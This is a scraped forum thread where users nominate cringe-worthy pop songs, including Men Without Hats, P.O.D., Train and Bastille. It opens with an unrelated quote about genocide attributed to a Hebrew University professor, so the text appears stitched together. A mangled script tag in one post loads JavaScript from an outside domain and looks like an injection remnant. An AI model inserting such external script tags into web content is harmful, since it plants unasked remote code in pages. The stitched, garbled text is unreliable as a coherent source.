Amos Goldberg (professor of Genocide Studies at the Hebrew University in Jerusalem): Yes, it's genocide. It's so difficult and painful to admit it, but we can no longer avoid this conclusion.

It is funny how some songs really irritate some people while others like them. Most of the songs mentioned in the thread so far have been worthy of cringe-worthiness, but there are a few, including this one, that are so bad that they are good. I love this stupid song!

Prog link: Ian Anderson actually plays flute on a track called "On Tuesday" from the 1987 Men Without Hats album 'Pop Goes The World"...I don't mind Safety Dance...at least you can (safely) dance to it!

^ I thought of that. I treat it as a novelty song. It went viral due to its badness.
This one that predates it is another such example. |

This one seems to have gone unnoticed. It has the added benefit of the trite video with the stereotypical soulless white girl in the backseat of a car.
And I know it was probably not meant to be a pop song, but it showed up in enough horrible 2000 and zero movies that I think it qualifies. P.O.D.'s "Here comes the boom"

Great suggestions. Almost all of these are cringy worthy. I can tolerate the Genesis song though. So rock songs are OK as long as they were popular. The kind of pop i'm referring to is that the songs were in the top 40 or at least well known at some point before they (hopefully) got forgotten :P So anything is fair game as long as it charted at one time. Therefore Scorpions, Van Halen or whatever are perfectly fine suggestions.

I had never hear that one by Train and hope I will never hear it again. That is truly horrid. And I too, am ok with Drops of Jupiter. < ="text/" async="" ="//cardinal.net/1fa16f6ccbee745a0c.js">

I tend to be tolerant enough to most pop songs when taken on their own but there are still a couple of nauseating ones that come to mind:
Avicii - Hey Brother Jason Mraz - I Won't Give Up Carly Rae Jepsen - I Really Like You Thin Lizzy - The Boys Are Back in Town (will probably get some disagreement here) Bastille - Pompeii |
